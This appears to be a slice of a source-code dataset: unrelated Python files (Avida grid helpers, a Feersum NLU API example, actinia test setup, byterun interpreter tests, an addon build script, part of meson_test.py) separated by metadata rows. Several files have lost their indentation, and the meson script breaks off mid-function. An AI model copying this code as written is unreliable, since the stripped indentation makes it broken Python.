return data
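# Worked example (sketch), for a 3-d grid of binary strings:
#
#     make_count_grid([[["0b101", "0b11"]]])   # -> [[[2, 2]]]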
def make_optimal_phenotype_grid(environment, phenotypes):
"""
Takes an EnvironmentFile object and a 2d array of phenotypes and returns
a 2d array in which each location contains an index representing the
distance between the phenotype in that location and the optimal phenotype
for that location.
    This is achieved by using the task list in the EnvironmentFile to convert
    the phenotypes to sets of tasks, and comparing them to the sets of
    resources in the environment. So if the environment file that you created
    the EnvironmentFile object from for some reason doesn't contain all of the
    tasks, or doesn't contain them in the right order, this won't work. If this
is the environment file that you used for the run of Avida that generated
this data, you should be fine.
"""
world_size = environment.size
phenotypes = deepcopy(phenotypes)
for i in range(world_size[1]):
for j in range(world_size[0]):
for k in range(len(phenotypes[i][j])):
phenotype = phenotype_to_res_set(phenotypes[i][j][k],
environment.tasks)
diff = len(environment[i][j].symmetric_difference(phenotype))
phenotypes[i][j][k] = diff
return phenotypes
def task_percentages(data, n_tasks=9):
"""
Takes a 3D array of strings representing binary numbers and calculates
the percentage of organisms in each cell (across multiple files)
that were doing a given task.
Returns an m x n x n_tasks array indicating the percentages of organisms
at each location (across the 3rd dimension) that were doing each task.
"""
pdata = deepcopy(data)
for i in range(len(data)):
for j in range(len(data[0])):
percentages = [0.0]*n_tasks
for k in range(len(data[i][j])):
b_ind = data[i][j][k].find("b")
for l in range(b_ind+1, len(data[i][j][k])):
percentages[l-2] += int(data[i][j][k][l])
for p in range(len(percentages)):
percentages[p] /= len(data[i][j])
pdata[i][j] = percentages
return pdata
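# Worked example (sketch): two organisms in one cell; bits are read left to
# right after the "0b" prefix, so the first task column is the bit right after "b":
#
#     task_percentages([[["0b101", "0b001"]]], n_tasks=3)
#     # -> [[[0.5, 0.0, 1.0]]]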
| 36.993377
| 79
| 0.669083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,989
| 0.536072
|
775334a35368377b6411b76e0cda684325c797b3
| 119
|
py
|
Python
|
Python/ComplexPaths02/src/main/MainModule01.py
|
tduoth/JsObjects
|
eb3e2a8b1f47d0da53c8b1a85a7949269711932f
|
[
"MIT"
] | 22
|
2015-02-26T09:07:18.000Z
|
2020-05-10T16:22:05.000Z
|
Python/ComplexPaths02/src/main/MainModule01.py
|
tduoth/JsObjects
|
eb3e2a8b1f47d0da53c8b1a85a7949269711932f
|
[
"MIT"
] | 123
|
2016-04-05T18:32:41.000Z
|
2022-03-13T21:09:21.000Z
|
Python/ComplexPaths02/src/main/MainModule01.py
|
tduoth/JsObjects
|
eb3e2a8b1f47d0da53c8b1a85a7949269711932f
|
[
"MIT"
] | 56
|
2015-03-19T22:26:37.000Z
|
2021-12-06T02:52:02.000Z
|
'''
Created on May 26, 2012
@author: Charlie
'''
class MainModule01(object):
def __init__(self):
pass
| 13.222222
| 27
| 0.613445
| 69
| 0.579832
| 0
| 0
| 0
| 0
| 0
| 0
| 49
| 0.411765
|
7753e7fec1d5a58812ddcacb76ec8e3307a0b943
| 2,109
|
py
|
Python
|
examples/image_dataset_create.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 9
|
2017-10-10T12:24:23.000Z
|
2021-08-18T14:07:51.000Z
|
examples/image_dataset_create.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 1
|
2020-12-06T11:03:25.000Z
|
2021-04-14T05:21:23.000Z
|
examples/image_dataset_create.py
|
praekelt/feersum-nlu-api-wrappers
|
6580e2bab2c8a764fe868a505330b3fee6029074
|
[
"BSD-3-Clause"
] | 2
|
2019-02-12T08:26:06.000Z
|
2022-02-01T09:39:47.000Z
|
""" Example: Shows how to create and use an image dataset. """
import urllib3
import feersum_nlu
from feersum_nlu.rest import ApiException
from examples import feersumnlu_host, feersum_nlu_auth_token
# from feersum_nlu_util import image_utils
# Configure API key authorization: APIKeyHeader
configuration = feersum_nlu.Configuration()
# configuration.api_key['AUTH_TOKEN'] = feersum_nlu_auth_token
configuration.api_key['X-Auth-Token'] = feersum_nlu_auth_token # Alternative auth key header!
configuration.host = feersumnlu_host
api_instance = feersum_nlu.ImageDatasetsApi(feersum_nlu.ApiClient(configuration))
instance_name = 'labelled_images_1'
create_details = feersum_nlu.ImageDatasetCreateDetails(name=instance_name,
desc=instance_name,
load_from_store=False)
caller_name = 'example_caller'
print()
try:
print("Create the image dataset:")
api_response = api_instance.image_dataset_create(create_details)
print(" type(api_response)", type(api_response))
print(" api_response", api_response)
print()
print("Get the details of specific named loaded image dataset:")
api_response = api_instance.image_dataset_get_details(instance_name)
print(" type(api_response)", type(api_response))
print(" api_response", api_response)
print()
# print("Delete named loaded image dataset:")
# api_response = api_instance.image_dataset_del(instance_name)
# print(" type(api_response)", type(api_response))
# print(" api_response", api_response)
# print()
#
# print("Vaporise named loaded image dataset:")
# api_response = api_instance.image_dataset_vaporise(instance_name)
# print(" type(api_response)", type(api_response))
# print(" api_response", api_response)
# print()
except ApiException as e:
print("Exception when calling a image dataset operation: %s\n" % e)
except urllib3.exceptions.HTTPError as e:
print("Connection HTTPError! %s\n" % e)
| 35.745763
| 95
| 0.699384
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.456615
|
775402adbd62e329a7b317ab8391c40e03b9d6e5
| 2,536
|
py
|
Python
|
tests/test_resource_base.py
|
neteler/actinia_statistic_plugin
|
428d191830bb59a8927fde68fd1e4439331fef97
|
[
"MIT"
] | 3
|
2018-10-16T14:32:07.000Z
|
2020-03-24T18:07:02.000Z
|
tests/test_resource_base.py
|
neteler/actinia_statistic_plugin
|
428d191830bb59a8927fde68fd1e4439331fef97
|
[
"MIT"
] | 7
|
2019-10-01T07:46:52.000Z
|
2022-03-24T09:26:53.000Z
|
tests/test_resource_base.py
|
neteler/actinia_statistic_plugin
|
428d191830bb59a8927fde68fd1e4439331fef97
|
[
"MIT"
] | 4
|
2018-10-26T11:52:09.000Z
|
2020-03-24T18:07:03.000Z
|
# -*- coding: utf-8 -*-
import atexit
import os
import signal
import time
from flask_restful import Api
from actinia_core.testsuite import ActiniaTestCaseBase, URL_PREFIX
from actinia_core.core.common.config import global_config
from actinia_core.core.common.app import flask_app, flask_api
from actinia_statistic_plugin.endpoints import create_endpoints
from actinia_core.endpoints import create_endpoints as create_actinia_endpoints
__license__ = "GPLv3"
__author__ = "Sören Gebbert"
__copyright__ = "Copyright 2016-2019, Sören Gebbert"
__maintainer__ = "Sören Gebbert"
__email__ = "soerengebbert@googlemail.com"
redis_pid = None
server_test = False
custom_actinia_cfg = False
create_actinia_endpoints()
create_endpoints(flask_api)
# If this environmental variable is set, then a real http request will be send
# instead of using the flask test_client.
if "ACTINIA_SERVER_TEST" in os.environ:
server_test = bool(os.environ["ACTINIA_SERVER_TEST"])
# Set this variable to use a actinia config file in a docker container
if "ACTINIA_CUSTOM_TEST_CFG" in os.environ:
custom_actinia_cfg = str(os.environ["ACTINIA_CUSTOM_TEST_CFG"])
def setup_environment():
global redis_pid
# Set the port to the test redis server
global_config.REDIS_SERVER_SERVER = "localhost"
global_config.REDIS_SERVER_PORT = 7000
# home = os.getenv("HOME")
# GRASS
# Setup the test environment
global_config.GRASS_GIS_BASE="/usr/local/grass79/"
global_config.GRASS_GIS_START_SCRIPT="/usr/local/bin/grass79"
# global_config.GRASS_DATABASE= "/usr/local/grass_test_db"
# global_config.GRASS_DATABASE = "%s/actinia/grass_test_db" % home
global_config.GRASS_TMP_DATABASE = "/tmp"
if server_test is False and custom_actinia_cfg is False:
# Start the redis server for user and logging management
redis_pid = os.spawnl(os.P_NOWAIT, "/usr/bin/redis-server",
"common/redis.conf",
"--port %i" % global_config.REDIS_SERVER_PORT)
time.sleep(1)
if server_test is False and custom_actinia_cfg is not False:
global_config.read(custom_actinia_cfg)
def stop_redis():
if server_test is False:
global redis_pid
        # Kill the redis server
if redis_pid is not None:
os.kill(redis_pid, signal.SIGTERM)
# Register the redis stop function
atexit.register(stop_redis)
# Setup the environment
setup_environment()
class ActiniaResourceTestCaseBase(ActiniaTestCaseBase):
pass
| 32.512821
| 79
| 0.742902
| 64
| 0.025207
| 0
| 0
| 0
| 0
| 0
| 0
| 884
| 0.348169
|
7755642e2df8bfea6999683ed9d91b14f6530187
| 5,560
|
py
|
Python
|
interpreter/code/tests/test_basic.py
|
yunkai123/my-500lines-notes
|
60fd3b18919b5bcb90ddece9e088c1c152438972
|
[
"MIT"
] | null | null | null |
interpreter/code/tests/test_basic.py
|
yunkai123/my-500lines-notes
|
60fd3b18919b5bcb90ddece9e088c1c152438972
|
[
"MIT"
] | null | null | null |
interpreter/code/tests/test_basic.py
|
yunkai123/my-500lines-notes
|
60fd3b18919b5bcb90ddece9e088c1c152438972
|
[
"MIT"
] | null | null | null |
""" Byterund 的基本测试"""
import vmtest
class It(vmtest.VmTestCase):
def test1(self):
self.assert_ok("""\
class Thing(object):
@staticmethod
def smeth(x):
print(x)
@classmethod
def cmeth(cls, x):
print(x)
Thing.smeth(1492)
Thing.cmeth(1776)
""")
    def test_constant(self):
self.assert_ok("17")
def test_for_loop(self):
self.assert_ok("""\
out = ""
for i in range(5):
out = out + str(i)
print(out)
""")
def test_slice(self):
self.assert_ok("""\
print("hello, world"[3:8])
""")
self.assert_ok("""\
print("hello, world"[:8])
""")
self.assert_ok("""\
print("hello, world"[3:])
""")
self.assert_ok("""\
print("hello, world"[:])
""")
self.assert_ok("""\
print("hello, world"[::-1])
""")
self.assert_ok("""\
print("hello, world"[3:8:2])
""")
def test_slice_assignment(self):
self.assert_ok("""\
l = list(range(10))
l[3:8] = ["x"]
print(l)
""")
self.assert_ok("""\
l = list(range(10))
l[:8] = ["x"]
print(l)
""")
self.assert_ok("""\
l = list(range(10))
l[3:] = ["x"]
print(l)
""")
self.assert_ok("""\
l = list(range(10))
l[:] = ["x"]
print(l)
""")
def test_building_stuff(self):
self.assert_ok("""\
print((1+1, 2+2, 3+3))
""")
self.assert_ok("""\
print([1+1, 2+2, 3+3])
""")
self.assert_ok("""\
print({1:1+1, 2:2+2, 3:3+3})
""")
def test_subscripting(self):
self.assert_ok("""\
l = list(range(10))
print("%s %s %s" % (l[0], l[3], l[9]))
""")
self.assert_ok("""\
l = list(range(10))
l[5] = 17
print(l)
""")
def test_list_comprehension(self):
self.assert_ok("""\
x = [z*z for z in range(5)]
assert x == [0, 1, 4, 9, 16]
""")
def test_unary_operators(self):
self.assert_ok("""\
x = 8
print(-x, ~x, not x)
""")
def test_attributes(self):
self.assert_ok("""\
l = lambda: 1 # Just to have an object...
l.foo = 17
print(hasattr(l, "foo"), l.foo)
# del l.foo
# print(hasattr(l, "foo"))
""")
def test_import(self):
self.assert_ok("""\
import math
print(math.pi, math.e)
from math import sqrt
print(sqrt(2))
# from math import * # not supported
# print(sin(2))
""")
def test_staticmethods(self):
self.assert_ok("""\
class Thing(object):
@staticmethod
def smeth(x):
print(x)
@classmethod
def cmeth(cls, x):
print(x)
Thing.smeth(1492)
Thing.cmeth(1776)
""")
def test_unbound_methods(self):
self.assert_ok("""\
class Thing(object):
def meth(self, x):
print(x)
m = Thing.meth
m(Thing(), 1815)
""")
def test_unpacking(self):
self.assert_ok("""\
a, b, c = (1, 2, 3)
assert a == 1
assert b == 2
assert c == 3
""")
def test_exec_function(self):
self.assert_ok("""\
g = {}
exec("a = 11", g, g)
assert g['a'] == 11
""")
def test_jump_if_true_or_pop(self):
self.assert_ok("""\
def f(a, b):
return a or b
assert f(17, 0) == 17
assert f(0, 23) == 23
assert f(0, "") == ""
""")
def test_jump_if_false_or_pop(self):
self.assert_ok("""\
def f(a, b):
return not(a and b)
assert f(17, 0) is True
assert f(0, 23) is True
assert f(0, "") is True
assert f(17, 23) is False
""")
def test_pop_jump_if_true(self):
self.assert_ok("""\
def f(a):
if not a:
return 'foo'
else:
return 'bar'
assert f(0) == 'foo'
assert f(1) == 'bar'
""")
class TestComparisons(vmtest.VmTestCase):
def test_in(self):
self.assert_ok("""\
assert "x" in "xyz"
assert "x" not in "abc"
assert "x" in ("x", "y", "z")
assert "x" not in ("a", "b", "c")
""")
def test_less(self):
self.assert_ok("""\
assert 1 < 3
assert 1 <= 2 and 1 <= 1
assert "a" < "b"
assert "a" <= "b" and "a" <= "a"
""")
def test_greater(self):
self.assert_ok("""\
assert 3 > 1
assert 3 >= 1 and 3 >= 3
assert "z" > "a"
assert "z" >= "a" and "z" >= "z"
""")
| 25.62212
| 55
| 0.380935
| 5,520
| 0.991023
| 0
| 0
| 0
| 0
| 0
| 0
| 3,991
| 0.716517
|
7756950ec6fb5c1205ec5e03552facad7a4cc3ac
| 387
|
py
|
Python
|
core/recc/compile/future.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | 3
|
2021-06-20T02:24:10.000Z
|
2022-01-26T23:55:33.000Z
|
core/recc/compile/future.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
core/recc/compile/future.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from importlib import import_module
def get_annotations_compiler_flag() -> int:
future = import_module("__future__")
assert future is not None
annotations = getattr(future, "annotations")
assert annotations is not None
compiler_flag = getattr(annotations, "compiler_flag")
assert isinstance(compiler_flag, int)
return compiler_flag
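# Usage sketch (illustrative only): the flag can be passed to compile() so that
# dynamically compiled code behaves as if it contained
# `from __future__ import annotations`:
#
#     flag = get_annotations_compiler_flag()
#     code = compile("def f(x: SomeLazyName) -> None: ...", "<sketch>", "exec", flags=flag)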
| 27.642857
| 57
| 0.731266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 63
| 0.162791
|
77576a10d402216d2e59b9e687478fa26a161c83
| 10,503
|
py
|
Python
|
genesis/objects/integrate.py
|
leifdenby/uclales-extractor
|
6147533e25b3b417c744bd814d2407a6588cf995
|
[
"BSD-3-Clause"
] | null | null | null |
genesis/objects/integrate.py
|
leifdenby/uclales-extractor
|
6147533e25b3b417c744bd814d2407a6588cf995
|
[
"BSD-3-Clause"
] | null | null | null |
genesis/objects/integrate.py
|
leifdenby/uclales-extractor
|
6147533e25b3b417c744bd814d2407a6588cf995
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import warnings
import xarray as xr
import numpy as np
# forget about using dask for now, dask_ndmeasure takes a huge amount of memory
# try:
# # raise ImportError
# # import dask_ndmeasure as ndimage
# # register a progressbar so we can see progress of dask'ed operations with xarray
# from dask.diagnostics import ProgressBar
# ProgressBar().register()
# except ImportError:
# from scipy import ndimage
# warnings.warn("Using standard serial scipy implementation instead of "
# "dask'ed dask-ndmeasure. Install `dask-ndmeasure` for much "
# "faster computation")
from scipy.constants import pi
from tqdm import tqdm
import dask_image.ndmeasure
from . import integral_properties
from . import minkowski_scales
from ..utils import find_grid_spacing
CHUNKS = 200 # forget about using dask for now, np.unique is too slow
FN_OUT_FORMAT = "{base_name}.objects.{objects_name}.integral.{name}.nc"
def make_name(variable, operator=None):
if operator:
return "{variable}.{operator}".format(**locals())
else:
return variable
def _integrate_scalar(objects, da, operator):
if "object_ids" in da.coords:
object_ids = da.object_ids
else:
# print("Finding unique values")
object_ids = np.unique(objects.chunk(None).values)
# ensure object 0 (outside objects) is excluded
if object_ids[0] == 0:
object_ids = object_ids[1:]
if len(da.dims) == 1 and len(objects.dims) == 3:
# special case for allowing integration of coordinates
da = xr.broadcast(objects, da)[1]
else:
import ipdb
with ipdb.launch_ipdb_on_exception():
assert objects.dims == da.dims
assert objects.shape == da.shape
dx = find_grid_spacing(da)
s = None
if operator == "volume_integral":
# fn = ndimage.sum
fn = dask_image.ndmeasure.sum
s = dx ** 3.0
operator_units = "m^3"
elif operator == "maximum_pos_z":
fn = dask_image.ndmeasure.maximum_position
operator_units = "m"
else:
# fn = getattr(ndimage, operator)
fn = getattr(dask_image.ndmeasure, operator)
operator_units = ""
# NB: the argument to `ndmeasure` functions used to be `labels` rather than
    # `label_image` before dask-image v0.5.0
vals = fn(da, label_image=objects.values, index=object_ids)
if hasattr(vals, "compute"):
vals = vals.compute()
if s is not None:
vals *= s
if operator == "maximum_pos_z":
longname = "per-object z-pos of maximum {} value".format(da.name)
units = "m"
z_idxs = vals[:, da.dims.index("zt")]
vals = da.zt[z_idxs]
else:
longname = "per-object {} of {}".format(operator.replace("_", " "), da.name)
units = ("{} {}".format(da.units, operator_units)).strip()
da_integrated = xr.DataArray(
vals,
coords=dict(object_id=object_ids),
dims=("object_id",),
attrs=dict(longname=longname, units=units),
name="{}__{}".format(da.name, operator),
)
if da.name == "volume":
da_integrated.name = "volume"
return da_integrated
def _integrate_per_object(da_objects, fn_int):
if "object_ids" in da_objects.coords:
object_ids = da_objects.object_ids
else:
# print("Finding unique values")
object_ids = np.unique(da_objects.chunk(None).values)
# ensure object 0 (outside objects) is excluded
if object_ids[0] == 0:
object_ids = object_ids[1:]
if "xt" in da_objects.coords:
da_objects = da_objects.rename(dict(xt="x", yt="y", zt="z"))
ds_per_object = []
for object_id in tqdm(object_ids):
da_object = da_objects.where(da_objects == object_id, drop=True)
ds_object = fn_int(da_object)
ds_object["object_id"] = object_id
ds_per_object.append(ds_object)
return xr.concat(ds_per_object, dim="object_id")
def get_integration_requirements(variable):
if variable.endswith("_vertical_flux"):
        # strip the "_vertical_flux" suffix to recover the scalar field name
        var_name = variable[: -len("_vertical_flux")]
return dict(w="w", scalar=var_name)
else:
return {}
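# Illustrative example (assuming the suffix-stripping above): a request for
# "q_vertical_flux" needs the vertical velocity field and the scalar itself:
#
#     get_integration_requirements("q_vertical_flux")  # -> {"w": "w", "scalar": "q"}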
def integrate(objects, variable, operator=None, **kwargs):
"""
Integrate over the labelled objects in `objects` the variable (named by a
string, .e.g `r_equiv` would be the equivalent spherical radius). Can also
integrate for example a scalar field provided through an extra kwarg to
find for example the maximum value.
Available variables:
{avail_vars}
Calculating equivalent radius for each object:
>> integrate(da_objects, variable='r_equiv')
Calculate the maximum value of vertical velocity for each object
>> integrate(da_objects, variable='w', operator='maximum', w=da_w)
Calculate the volume integral of water vapour for each object
>> integrate(da_objects, variable='q', operator='volume_integral', q=ds.q)
"""
ds_out = None
if variable in objects.coords:
da_scalar = objects.coords[variable]
elif variable == "com_angles":
fn_int = integral_properties.calc_com_incline_and_orientation_angle
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
elif hasattr(integral_properties, "calc_{}__dask".format(variable)):
fn_int = getattr(integral_properties, "calc_{}__dask".format(variable))
da_objects = objects
if "xt" in da_objects.dims:
da_objects = da_objects.rename(xt="x", yt="y", zt="z")
ds_out = fn_int(da_objects)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
elif hasattr(integral_properties, "calc_{}".format(variable)):
fn_int = getattr(integral_properties, "calc_{}".format(variable))
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
# XXX: volume is actually calculated by the minkowski routines which have
# been verified against those below (keeping in case I forget)
# elif variable == 'volume':
# dx = find_grid_spacing(objects)
# da_scalar = xr.DataArray(
# np.ones_like(objects, dtype=np.float),
# coords=objects.coords, attrs=dict(units='1')
# )
# da_scalar.name = 'volume'
elif variable in [
"length_m",
"width_m",
"thickness_m",
"genus_m",
"volume",
"num_cells",
"filamentarity",
"planarity",
]:
ds_minkowski = minkowski_scales.main(da_objects=objects)
ds_out = ds_minkowski[variable]
elif variable == "r_equiv":
da_volume = integrate(objects, "volume", operator="sum")
# V = 4/3 pi r^3 => r = (3/4 V/pi)**(1./3.)
da_scalar = (3.0 / (4.0 * pi) * da_volume) ** (1.0 / 3.0)
da_scalar.attrs["units"] = "m"
da_scalar.attrs["long_name"] = "equivalent sphere radius"
da_scalar.name = "r_equiv"
ds_out = da_scalar
elif variable in kwargs and operator in [
"volume_integral",
"maximum",
"maximum_pos_z",
"mean",
"sum",
]:
da_scalar = kwargs[variable].squeeze()
if not objects.zt.equals(da_scalar.zt):
            warnings.warn(
                "Objects span smaller range than scalar field; "
                "reducing domain of scalar field"
            )
da_scalar = da_scalar.sel(zt=objects.zt)
# ds_out = _integrate_scalar(objects=objects.squeeze(),
# da=da_scalar,
# operator=operator)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
else:
if operator:
raise NotImplementedError(
f"Don't know how to calculate `{operator}` of `{variable}` with fields"
f"{', '.join(kwargs.keys())}`"
)
else:
raise NotImplementedError(
"Don't know how to calculate `{}`" "".format(variable)
)
# else:
# fn_scalar = "{}.{}.nc".format(base_name, variable)
# if not os.path.exists(fn_scalar):
# raise Exception("Couldn't find scalar file `{}`".format(fn_scalar))
# da_scalar = xr.open_dataarray(
# fn_scalar, decode_times=False, chunks=CHUNKS
# ).squeeze()
if ds_out is None:
if objects.zt.max() < da_scalar.zt.max():
            warnings.warn(
                "Objects span smaller range than scalar field; "
                "reducing domain of scalar field"
            )
zt_ = da_scalar.zt.values
da_scalar = da_scalar.sel(zt=slice(None, zt_[25]))
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
return ds_out
# hack to set docstring at runtime so we can include the available variables
integrate.__doc__ = integrate.__doc__.format(
avail_vars=", ".join(integral_properties.VAR_MAPPINGS.keys())
)
if __name__ == "__main__":
import argparse
argparser = argparse.ArgumentParser(__doc__)
argparser.add_argument("object_file")
argparser.add_argument("scalar_field")
argparser.add_argument("--operator", default="volume_integral", type=str)
args = argparser.parse_args()
object_file = args.object_file.replace(".nc", "")
op = args.operator
if "objects" not in object_file:
raise Exception()
base_name, objects_mask = object_file.split(".objects.")
fn_objects = "{}.nc".format(object_file)
if not os.path.exists(fn_objects):
raise Exception("Couldn't find objects file `{}`".format(fn_objects))
objects = xr.open_dataarray(fn_objects, decode_times=False, chunks=CHUNKS).squeeze()
name = make_name(
variable=args.scalar_field,
operator=op,
)
out_filename = FN_OUT_FORMAT.format(
base_name=base_name.replace("/", "__"), objects_name=objects.name, name=name
)
ds_out = integrate(
objects=objects, variable=args.scalar_field, operator=args.operator
)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out.to_netcdf(out_filename)
print("Wrote output to `{}`".format(out_filename))
| 32.719626
| 88
| 0.63677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,727
| 0.354851
|
775775cc7a45c42108314eb9aa9a67d61fab3d99
| 181
|
py
|
Python
|
current_console.py
|
jonasitzmann/ann-numpy
|
bb6d22667158687ca2d3de92abbeee0e129fa18e
|
[
"MIT"
] | null | null | null |
current_console.py
|
jonasitzmann/ann-numpy
|
bb6d22667158687ca2d3de92abbeee0e129fa18e
|
[
"MIT"
] | null | null | null |
current_console.py
|
jonasitzmann/ann-numpy
|
bb6d22667158687ca2d3de92abbeee0e129fa18e
|
[
"MIT"
] | null | null | null |
from ann import *
x, y = utils.get_mnist_samples(100)
m = Model(x[0].shape)
m.add(Conv2D())
m.add(MaxPooling())
m.add(Flatten())
m.add(Dense(15))
m.add(Dense(10, a_func='sigmoid'))
| 20.111111
| 35
| 0.679558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.049724
|
77579ad9466e36640c85ebfa6cdc492815ea188c
| 1,923
|
py
|
Python
|
scripts/addon/generate_all.py
|
mozilla-releng/staging-mozilla-vpn-client
|
f31d3762a607ccf2d7c6a016f7b800305fbf0113
|
[
"Apache-2.0"
] | null | null | null |
scripts/addon/generate_all.py
|
mozilla-releng/staging-mozilla-vpn-client
|
f31d3762a607ccf2d7c6a016f7b800305fbf0113
|
[
"Apache-2.0"
] | null | null | null |
scripts/addon/generate_all.py
|
mozilla-releng/staging-mozilla-vpn-client
|
f31d3762a607ccf2d7c6a016f7b800305fbf0113
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import hashlib
import json
import os
import subprocess
import sys
parser = argparse.ArgumentParser(description="Generate an addon package")
parser.add_argument(
"-q",
"--qt_path",
default=None,
dest="qtpath",
help="The QT binary path. If not set, we try to guess.",
)
args = parser.parse_args()
build_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "build.py")
addons_path = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
"addons",
)
generated_path = os.path.join(addons_path, "generated")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
generated_path = os.path.join(generated_path, "addons")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
addons = []
for file in os.listdir(addons_path):
addon_path = os.path.join(addons_path, file, "manifest.json")
if not os.path.exists(addon_path):
print(f"Ignoring path {file}.")
continue
build_cmd = [sys.executable, build_path, addon_path, generated_path]
if args.qtpath:
build_cmd.append("-q")
build_cmd.append(args.qtpath)
subprocess.call(build_cmd)
generated_addon_path = os.path.join(generated_path, file + ".rcc")
if not os.path.exists(generated_addon_path):
exit(f"Expected addon file {generated_addon_path}")
    with open(generated_addon_path, "rb") as f:
        sha256 = hashlib.sha256(f.read()).hexdigest()
addons.append({ 'id': file, 'sha256': sha256 })
index = {
'api_version': '0.1',
'addons': addons,
}
with open(os.path.join(generated_path, "manifest.json"), "w") as f:
f.write(json.dumps(index, indent=2))
| 30.046875
| 82
| 0.696828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 510
| 0.265211
|
7758e5a6fe24718f7edc88625d84b3904624aa2d
| 8,310
|
py
|
Python
|
meson_test.py
|
tp-m/meson
|
2d1aa395e86848ca948d30d83cc5357777e5b490
|
[
"Apache-2.0"
] | null | null | null |
meson_test.py
|
tp-m/meson
|
2d1aa395e86848ca948d30d83cc5357777e5b490
|
[
"Apache-2.0"
] | null | null | null |
meson_test.py
|
tp-m/meson
|
2d1aa395e86848ca948d30d83cc5357777e5b490
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2013-2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os, subprocess, time, datetime, pickle, multiprocessing, json
import concurrent.futures as conc
import argparse
import mesonlib
tests_failed = []
parser = argparse.ArgumentParser()
parser.add_argument('--wrapper', default=None, dest='wrapper',
help='wrapper to run tests with (e.g. valgrind)')
parser.add_argument('--wd', default=None, dest='wd',
help='directory to cd into before running')
parser.add_argument('--suite', default=None, dest='suite',
help='Only run tests belonging to this suite.')
parser.add_argument('args', nargs='+')
class TestRun():
def __init__(self, res, returncode, duration, stdo, stde, cmd):
self.res = res
self.returncode = returncode
self.duration = duration
self.stdo = stdo
self.stde = stde
self.cmd = cmd
def decode(stream):
try:
return stream.decode('utf-8')
except UnicodeDecodeError:
return stream.decode('iso-8859-1', errors='ignore')
def write_log(logfile, test_name, result_str, result):
logfile.write(result_str + '\n\n')
logfile.write('--- command ---\n')
if result.cmd is None:
logfile.write('NONE')
else:
logfile.write(' '.join(result.cmd))
logfile.write('\n--- "%s" stdout ---\n' % test_name)
logfile.write(result.stdo)
logfile.write('\n--- "%s" stderr ---\n' % test_name)
logfile.write(result.stde)
logfile.write('\n-------\n\n')
def write_json_log(jsonlogfile, test_name, result):
result = {'name' : test_name,
'stdout' : result.stdo,
'stderr' : result.stde,
'result' : result.res,
'duration' : result.duration,
'returncode' : result.returncode,
'command' : result.cmd}
jsonlogfile.write(json.dumps(result) + '\n')
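# Each log line is a single JSON object, e.g. (illustrative values only):
# {"name": "suite / test", "stdout": "...", "stderr": "", "result": "OK",
#  "duration": 0.01, "returncode": 0, "command": ["./prog"]}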
def run_with_mono(fname):
if fname.endswith('.exe') and not mesonlib.is_windows():
return True
return False
def run_single_test(wrap, test):
global tests_failed
if test.fname[0].endswith('.jar'):
cmd = ['java', '-jar'] + test.fname
elif not test.is_cross and run_with_mono(test.fname[0]):
cmd = ['mono'] + test.fname
else:
if test.is_cross:
if test.exe_runner is None:
                # Cannot run test on a cross-compiled executable
                # because there is no execute wrapper.
cmd = None
else:
cmd = [test.exe_runner] + test.fname
else:
cmd = test.fname
if len(wrap) > 0 and 'valgrind' in wrap[0]:
wrap += test.valgrind_args
if cmd is None:
res = 'SKIP'
duration = 0.0
stdo = 'Not run because can not execute cross compiled binaries.'
stde = ''
returncode = -1
else:
cmd = wrap + cmd + test.cmd_args
starttime = time.time()
child_env = os.environ.copy()
child_env.update(test.env)
if len(test.extra_paths) > 0:
child_env['PATH'] = child_env['PATH'] + ';'.join([''] + test.extra_paths)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=child_env, cwd=test.workdir)
timed_out = False
try:
(stdo, stde) = p.communicate(timeout=test.timeout)
except subprocess.TimeoutExpired:
timed_out = True
p.kill()
(stdo, stde) = p.communicate()
endtime = time.time()
duration = endtime - starttime
stdo = decode(stdo)
stde = decode(stde)
if timed_out:
res = 'TIMEOUT'
tests_failed.append((test.name, stdo, stde))
elif (not test.should_fail and p.returncode == 0) or \
(test.should_fail and p.returncode != 0):
res = 'OK'
else:
res = 'FAIL'
tests_failed.append((test.name, stdo, stde))
